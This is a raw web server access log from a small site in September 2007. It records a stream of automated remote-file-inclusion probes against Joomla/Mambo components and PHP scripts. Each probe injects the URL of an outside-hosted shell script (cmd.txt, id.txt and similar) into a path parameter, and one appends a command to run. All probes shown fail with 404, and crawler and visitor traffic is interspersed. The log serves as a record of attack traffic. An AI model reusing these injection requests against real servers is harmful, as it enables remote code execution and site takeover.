72.232.166.139 - - [16/Sep/2007:17:59:36 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://majorland.free.fr/spip/eva/presentation.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.166.139 - - [16/Sep/2007:17:59:36 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://majorland.free.fr/spip/eva/presentation.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:18:03:25 -0700] "GET /logs/access_070716.log//sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.232.166.139 - - [16/Sep/2007:18:04:34 -0700] "GET /logs/access_070903.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://majorland.free.fr/spip/eva/presentation.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.166.139 - - [16/Sep/2007:18:04:35 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://majorland.free.fr/spip/eva/presentation.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.166.139 - - [16/Sep/2007:18:04:35 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://majorland.free.fr/spip/eva/presentation.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.186.130 - - [16/Sep/2007:18:07:49 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://nogglenk.com/ngk.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
205.234.213.159 - - [16/Sep/2007:18:08:44 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.222.131.60 - - [16/Sep/2007:18:09:31 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://nogglenk.com/ngk.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.16.214.18 - - [16/Sep/2007:18:10:40 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wisdom-creation.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.16.214.18 - - [16/Sep/2007:18:10:41 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wisdom-creation.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.134.232.99 - - [16/Sep/2007:18:11:44 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wisdom-creation.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.134.232.99 - - [16/Sep/2007:18:11:44 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wisdom-creation.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
194.137.58.80 - - [16/Sep/2007:18:15:12 -0700] "GET /logs/index1.php?dat=http://h1.ripway.com/tsk2008/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.137.58.80 - - [16/Sep/2007:18:15:12 -0700] "GET /logs/index2.php?url_page=http://h1.ripway.com/tsk2008/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.137.58.80 - - [16/Sep/2007:18:15:13 -0700] "GET /index1.php?dat=http://h1.ripway.com/tsk2008/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.137.58.80 - - [16/Sep/2007:18:15:13 -0700] "GET /index2.php?url_page=http://h1.ripway.com/tsk2008/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.137.58.80 - - [16/Sep/2007:18:15:53 -0700] "GET /logs/index1.php?x=http://h1.ripway.com/tsk2008/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.137.58.80 - - [16/Sep/2007:18:15:53 -0700] "GET /index1.php?x=http://h1.ripway.com/tsk2008/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.222.131.60 - - [16/Sep/2007:18:19:45 -0700] "GET /index.php?go=http://nogglenk.com/ngk.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.147.236.194 - - [16/Sep/2007:18:22:47 -0700] "GET /administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
164.81.22.52 - - [16/Sep/2007:18:23:16 -0700] "GET /print.php?table=http://72.143.157.159/x.asc/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.58.58 - - [16/Sep/2007:18:24:18 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.sindromx.com/opp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.93.58.58 - - [16/Sep/2007:18:24:19 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.sindromx.com/opp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
164.81.22.52 - - [16/Sep/2007:18:24:36 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://72.143.157.159/x.asc/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
164.81.22.52 - - [16/Sep/2007:18:24:36 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://72.143.157.159/x.asc/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
198.32.252.58 - - [16/Sep/2007:18:27:21 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://litescript.gopzap.com/pbotcmd3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
198.32.252.58 - - [16/Sep/2007:18:27:22 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://litescript.gopzap.com/pbotcmd3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.137.58.80 - - [16/Sep/2007:18:27:45 -0700] "GET /logs/index2.php?x=http://h1.ripway.com/tsk2008/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.137.58.80 - - [16/Sep/2007:18:27:45 -0700] "GET /index2.php?x=http://h1.ripway.com/tsk2008/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.93.186.130 - - [16/Sep/2007:18:28:02 -0700] "GET //skin/zero_vote/error.php?dir=http://nogglenk.com/ngk.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.19.107.174 - - [16/Sep/2007:18:29:56 -0700] "GET //skin/zero_vote/error.php?dir=http://nogglenk.com/ngk.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.249.73.202 - - [16/Sep/2007:18:32:48 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
66.249.73.202 - - [16/Sep/2007:18:32:48 -0700] "GET /logs/access_070730.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
72.30.226.137 - - [16/Sep/2007:18:33:08 -0700] "GET /logs/access_070716.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
66.147.236.194 - - [16/Sep/2007:18:33:31 -0700] "GET /logs/access_070806.log/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.147.236.194 - - [16/Sep/2007:18:33:31 -0700] "GET /logs/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.147.236.194 - - [16/Sep/2007:18:33:46 -0700] "GET /logs/access_070716.log/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.186.130 - - [16/Sep/2007:18:39:17 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://nogglenk.com/ngk.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.93.186.130 - - [16/Sep/2007:18:40:36 -0700] "GET /index.php?pag=http://nogglenk.com/ngk.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.222.131.60 - - [16/Sep/2007:18:42:04 -0700] "GET /index.php?pag=http://nogglenk.com/ngk.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
164.81.22.52 - - [16/Sep/2007:18:42:11 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://72.143.157.159/x.asc/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.222.131.60 - - [16/Sep/2007:18:42:28 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://nogglenk.com/ngk.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.184.66 - - [16/Sep/2007:18:42:32 -0700] "GET //modules/My_eGallery/index.php?basepath=http://chronosx.free.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.227.124 - - [16/Sep/2007:18:42:38 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.227.124 - - [16/Sep/2007:18:42:38 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.227.124 - - [16/Sep/2007:18:43:47 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.227.124 - - [16/Sep/2007:18:43:47 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.241.214.66 - - [16/Sep/2007:18:49:29 -0700] "GET /administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=http://www.wendelcruz.com/galeria/include/service.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.239.143.134 - - [16/Sep/2007:18:50:33 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://asd.edu.ar/club/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.239.143.134 - - [16/Sep/2007:18:50:33 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://asd.edu.ar/club/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.239.143.134 - - [16/Sep/2007:18:50:34 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://asd.edu.ar/club/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.239.143.134 - - [16/Sep/2007:18:50:34 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://asd.edu.ar/club/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
201.8.90.221 - - [16/Sep/2007:18:52:00 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.shellfull.xpg.com.br/cmd.txt?&cmd=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
164.81.22.52 - - [16/Sep/2007:18:52:44 -0700] "GET /logs/access.log/print.php?table=http://72.143.157.159/x.asc/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
164.81.22.52 - - [16/Sep/2007:18:52:44 -0700] "GET /logs/print.php?table=http://72.143.157.159/x.asc/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.72.240.66 - - [16/Sep/2007:18:54:19 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://chronosx.free.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
164.81.22.52 - - [16/Sep/2007:18:55:50 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://72.143.157.159/x.asc/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.249.73.202 - - [16/Sep/2007:18:56:48 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "galf.org"
66.249.73.202 - - [16/Sep/2007:18:56:49 -0700] "GET /logs/access_070827.log HTTP/1.1" 200 549059 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "galf.org"
70.84.184.66 - - [16/Sep/2007:18:57:15 -0700] "GET /logs/access_070618.log//modules/My_eGallery/index.php?basepath=http://chronosx.free.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.184.66 - - [16/Sep/2007:18:57:15 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://chronosx.free.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.184.66 - - [16/Sep/2007:18:57:40 -0700] "GET /logs/access_070827.log//modules/My_eGallery/index.php?basepath=http://chronosx.free.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
164.81.22.52 - - [16/Sep/2007:18:59:34 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://72.143.157.159/x.asc/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
164.81.22.52 - - [16/Sep/2007:18:59:34 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://72.143.157.159/x.asc/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.115.154.188 - - [16/Sep/2007:19:09:53 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://pucorp.t5.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
81.115.154.188 - - [16/Sep/2007:19:09:54 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://pucorp.t5.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
69.16.214.18 - - [16/Sep/2007:19:10:37 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wisdom-creation.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.16.214.18 - - [16/Sep/2007:19:10:37 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wisdom-creation.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.249.73.202 - - [16/Sep/2007:19:10:51 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
66.249.73.202 - - [16/Sep/2007:19:11:31 -0700] "GET /logs/ HTTP/1.1" 200 5085 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
164.81.22.52 - - [16/Sep/2007:19:12:11 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://72.143.157.159/x.asc/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
164.81.22.52 - - [16/Sep/2007:19:12:11 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://72.143.157.159/x.asc/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
164.81.22.52 - - [16/Sep/2007:19:12:36 -0700] "GET /logs/access_070806.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://72.143.157.159/x.asc/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.134.232.99 - - [16/Sep/2007:19:12:51 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wisdom-creation.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
205.134.232.99 - - [16/Sep/2007:19:12:51 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wisdom-creation.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
201.230.115.71 - - [16/Sep/2007:19:13:53 -0700] "GET / HTTP/1.1" 200 1048 "http://www.google.com.pe/search?q=lesbianas+peru&hl=es&client=firefox-a&rls=org.mozilla:es-ES:official&start=0&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 6.0; es-ES; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.galf.org"
201.230.115.71 - - [16/Sep/2007:19:14:14 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; es-ES; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.galf.org"
201.230.115.71 - - [16/Sep/2007:19:15:10 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; es-ES; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:19:15:20 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:19:15:20 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.249.73.202 - - [16/Sep/2007:19:17:38 -0700] "GET /logs/access.log HTTP/1.1" 200 41962 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:19:19:56 -0700] "GET /logs/access_070806.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.37.150.161 - - [16/Sep/2007:19:21:24 -0700] "GET /logs/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/alvarezluque/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.37.150.161 - - [16/Sep/2007:19:21:25 -0700] "GET /administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/alvarezluque/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
66.11.227.124 - - [16/Sep/2007:19:28:20 -0700] "GET /logs/access.log/index2.php?x=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.227.124 - - [16/Sep/2007:19:28:20 -0700] "GET /index2.php?x=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.227.124 - - [16/Sep/2007:19:28:20 -0700] "GET /logs/index2.php?x=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.227.124 - - [16/Sep/2007:19:40:18 -0700] "GET /logs/middle.php?file=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.227.124 - - [16/Sep/2007:19:40:18 -0700] "GET /middle.php?file=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
147.202.41.39 - - [16/Sep/2007:19:41:55 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/u.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
147.202.41.39 - - [16/Sep/2007:19:41:55 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/u.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.18.233.58 - - [16/Sep/2007:19:42:42 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.aniversaris.info/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.18.233.58 - - [16/Sep/2007:19:42:42 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.aniversaris.info/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.59.160.32 - - [16/Sep/2007:19:43:06 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.babe-forum.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.59.160.32 - - [16/Sep/2007:19:43:06 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.babe-forum.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.11.227.124 - - [16/Sep/2007:19:44:38 -0700] "GET /logs/middle.php?file=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.227.124 - - [16/Sep/2007:19:44:38 -0700] "GET /middle.php?file=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.205.196.4 - - [16/Sep/2007:19:44:50 -0700] "GET /logs/index.php?pag=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.205.196.4 - - [16/Sep/2007:19:44:50 -0700] "GET /index.php?pag=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.83.65 - - [16/Sep/2007:19:46:43 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.83.65 - - [16/Sep/2007:19:46:43 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
216.75.21.221 - - [16/Sep/2007:19:46:44 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.turismeruralpallarsjussa.info/error/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.75.21.221 - - [16/Sep/2007:19:46:44 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.turismeruralpallarsjussa.info/error/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.18.233.58 - - [16/Sep/2007:19:49:00 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.aniversaris.info/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.59.160.32 - - [16/Sep/2007:19:49:20 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.babe-forum.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.46.201.169 - - [16/Sep/2007:19:52:03 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.46.201.169 - - [16/Sep/2007:19:52:03 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.75.21.221 - - [16/Sep/2007:19:53:55 -0700] "GET /logs/access_070903.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.turismeruralpallarsjussa.info/error/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.18.233.58 - - [16/Sep/2007:19:57:12 -0700] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.aniversaris.info/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.18.233.58 - - [16/Sep/2007:19:57:12 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.aniversaris.info/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.186.130 - - [16/Sep/2007:19:58:51 -0700] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://nogglenk.com/ngk.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.59.160.32 - - [16/Sep/2007:19:59:56 -0700] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.babe-forum.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.59.160.32 - - [16/Sep/2007:19:59:57 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.babe-forum.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.83.65 - - [16/Sep/2007:20:01:13 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.46.201.169 - - [16/Sep/2007:20:02:16 -0700] "GET /logs/access_070903.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:20:02:30 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:20:02:30 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:20:02:30 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
